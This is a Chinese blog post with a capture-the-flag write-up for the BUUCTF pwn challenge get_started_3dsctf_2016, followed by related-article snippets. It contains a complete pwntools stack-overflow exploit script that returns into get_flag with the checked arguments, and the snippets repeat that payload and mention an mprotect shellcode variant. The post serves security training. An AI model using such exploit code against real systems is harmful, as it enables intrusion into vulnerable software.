BUUCTF pwn——get_started_3dsctf_2016

最新推荐文章于 2024-07-07 17:28:09 发布
最新推荐文章于 2024-07-07 17:28:09 发布
阅读量116 收藏
点赞数
分类专栏: [个人向]做题练习WP 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45770420/article/details/129899265
版权

checksec

在这里插入图片描述

运行

直接输入就行
在这里插入图片描述

ida

main函数接收输入

在这里插入图片描述

存在名为get_flag的函数,调用可直接getflag

只要让a1和a2通过校验就行
在这里插入图片描述

给输入分配的栈空间为0x38

在这里插入图片描述

利用思路

只要让main的输入长度溢出到get_flag的地址就好

代码

'''
@Author       : 白银
@Date         : 2023-04-01 15:45:04
@LastEditors  : 白银
@LastEditTime : 2023-04-01 16:40:52
@FilePath     : /pwn/get_started_3dsctf_2016.py
@Description  : https://buuoj.cn/challenges#get_started_3dsctf_2016
@Attention    : 
@Copyright (c) 2023 by 白银 captain-jparrow@qq.com, All Rights Reserved. 
'''

from pwn import *

set_arch = 2  # set_arch中,int,0→amd64,1→arm64,2→i386
pwnfile = './get_started_3dsctf_2016'  # pwnfile, str,二进制文件
if_remote = 1  # if_remote,int,1→远程,别的数字→本地
# 打本地,if_remote改别的数字就可以,最后两个参数随便改

# set_arch = 0
if set_arch == 0:
    context(log_level='debug', arch='amd64', os='linux')
elif set_arch == 1:
    context(log_level='debug', arch='arm64', os='linux')
elif set_arch == 2:
    context(log_level='debug', arch='i386', os='linux')

print(context)
# context(log_level='debug', arch='i386', os='linux')
# pwnfile = './pwn1'
elf = ELF(pwnfile)

if if_remote == 1:
    # io = remote("192.168.61.139", 8888)
    # io = remote(remote_addr, remote_port)
    io = remote("node4.buuoj.cn", 26313)
    # libc = ELF('/home/usrname/Desktop/libc.so.6')
    if set_arch == 0 or set_arch == 1:
        libc = ELF('/home/usrname/Desktop/2.23x64libc.so.6')
    else:
        libc = ELF('/housrnameack/Desktop/2.23x86libc.so.6')
else:
    io = process(pwnfile)
    # 本地用
    # elf = ELF(pwnfile)
    libc = elf.libc
    rop = ROP(pwnfile)
    # 本地调试用
    gdb.attach(io)
    pause()

padding = 0x38  # ida看,上限和r差多少
return_addr = 0x80489a0  # 程序里面有get_flag的函数,直接找地址
exit_addr = 0x804e6a0
a1 = 0x308CD64F
a2 = 0x195719D1

# payload = b'a' * padding + p32(0x080489A0) + p32(0x0804E6A0) + p32(a1) + p32(a2)
# payload = b'a' * padding + p32(return_addr) + p32(exit_addr) + p32(a1) + p32(a2)
payload = flat(['a' * padding, return_addr, exit_addr, a1, a2])
print(payload)
# print(payload2)
# delimiter = 'Qual a palavrinha magica? '

if if_remote == 1:
    io.sendline(payload)
    # io.sendlineafter(delimiter, payload)  # 远程用

else:
    io.sendline(payload)
    # io.sendlineafter(delimiter, payload)  # 本地用

io.interactive()

没有shell,直接getflag

在这里插入图片描述

Captain杰派罗
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
get_started_3dsctf_2016|get_started_3dsctf_2016
12-11
网络安全逆向PWN题目,简单的栈溢出,虽然有后门函数,但同时又给了一定的限制条件,可以使用更复杂的ROP解法。该样本题解:https://blog.csdn.net/A951860555/article/details/111030289
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
BUUCTF(Pwn)get_started_3dsctf_2016
半岛铁盒的博客
03-27 354
from pwn import * p = remote("node3.buuoj.cn",28584) context.log_level = 'debug' a1 = 0x308cd64f a2 = 0x195719d1 get_flag_addr = 0x080489A0 exit_addr = 0x0804E6A0 payload = 'a'* 0x38 + p32(get_flag_addr) + p32(exit_addr)+ p32(a1) + p32(a2) p.sendline(pay..
BUUCTF get_started_3dsctf_2016
最新发布
zwb2603096342的博客
07-07 1051
mprotect的运用
BUUCTF - PWN】get_started_3dsctf_2016
古月浪子的博客
03-25 1547
checksec一下,可以栈溢出 IDA打开看看,一个很普通的栈溢出漏洞,有后门函数,应该说是一道非常简单的题了 但是,本地打通非常容易,可是靶机打不通 =_= 于是乎,换个方法,利用mprotect函数修改bss段为rwx,写入shellcode跳过去执行 from pwn import * from LibcSearcher import * context.os='linux' con...
BUUCTF PWN get_started_3dsctf_2016
Rt1Text的博客
04-23 339
1.checksec +运行 32位/NX保护 2.32位IDA 1.main函数 gets()函数溢出 跟进v4看看偏移 offset=0x38 这个题有些不同,看看调用函数的汇编 该题没有用ebp寻址,用的是esp寻址 也就是说不需要覆盖ebp四字节 这就说明有时候后卡住回去仔细看看汇编 2.get_flag if ( a1 == 814536271 && a2 == 425138641 ) a1/a2满足条件即可得到flag.tx...
buuctf get_started_3dsctf_2016
carol2358的博客
04-09 456
先checksec 这道题打远程需要改变内存权限,需要用到mprotec,这道题里也是有这个函数的 这道题有点特殊,是没有bp的,程序的函数调用约定是cdecl,依靠sp来进行平衡栈,需要取值就看与sp的偏移。 padding为0x38 大致的思路就是先找到mprotect,bss,read(向bss写入shell),pop(用来pop出mprotect的参数,进行第二次函数调用)的地址,然后传...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
PWN.rar_pulse verilog_pulse width_verilog hdl
09-20
3. **复用和同步**:确保所有操作都在正确的时钟边沿进行,防止竞争冒险和 metastability 问题。 4. **测试平台**:为了验证Verilog代码的正确性,需要创建一个测试平台,提供各种输入值并检查输出是否符合预期。 ...
BUUCTF get_started_3dsctf_2016(mprotect)
、moddemod
06-10 533
典型的栈溢出 而且还留了后门 在本地可以拿到flag.txt文件,但是远程不行! 栈不可执行 原型: int mprotect(const void *start, size_t len, int prot) start:需改写属性的内存中开始地址 len:需改写属性的内存长度 prot:需要修改为的指定值 功能: mprotect()函数可以用来修改一段指定内存区域的保护属性。 他把自start开始的、长度为len的内存区的保护属性修改为prot指定的值。 prot可以取以下几个值: 1)PRO.
pwn3dsctf2016_get_started
Nothing
12-12 278
例行检查 file一下,发现是静态连接的,还没有Pie。 分析程序发现是简单栈溢出,还有一个get_flag函数?于是直接返回到get_flag函数执行,但是远程没有打通,然后试了下本地可以打通,然后猜测可能是远程环境部署错了,没有flag.txt文件? 然后试试别的方法。 由于是静态链接里面函数还是很多的。 1.mprotect,修改某地址为rwx,随后写入shellcode,然后getshel...
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 169
题目截图
buuctf|get_started_3dsctf_2016 1
m0_64236521的博客
05-01 648
方法一 我将文件下载后将其重命名为pwn_13,checksec一下 可以直接栈溢出,32位,进入ida gets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看 只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit() exp如下 from pwn import* p=remote('node4.buuoj.cn',26832) context.log_level='debu
[BUUCTF-pwn]——get_started_3dsctf_2016
Y_peak的博客
02-10 236
[BUUCTF-pwn]——get_started_3dsctf_2016 题目地址:https://buuoj.cn/challenges#get_started_3dsctf_2016 题目: 这道题让我学到很多细节,虽然又一次栽倒了没有ebp的坑中 首先还是先checksec 一下看看,老样子32位NX保护. IDA中 看到这些,你是不是和我一样觉得so easy!!! 我一开始也觉得这种题 payload = ‘a’ * offest + ‘junk’ + get_flag的地址 +
BUUCTF pwn rip
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP详解主要讲解了如何利用RIP寄存器来进行PWN攻击。RIP寄存器是存储下一条指令的地址,通过控制RIP寄存器的值,可以改变程序的执行流程,从而实现攻击的目的。 PWN攻击是一种利用软件漏洞来获取对计算机系统的控制权的攻击方式。在PWN攻击中,攻击者通常会利用程序中的漏洞,通过输入特定的数据来改变程序的执行流程,从而实现攻击的目的。 BUUCTF PWN-RIP详解文章提供了一些示例和技巧,帮助读者理解和掌握PWN攻击中利用RIP寄存器的方法。如果你对PWN攻击感兴趣,可以阅读该文章以获取更多详细信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Captain杰派罗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值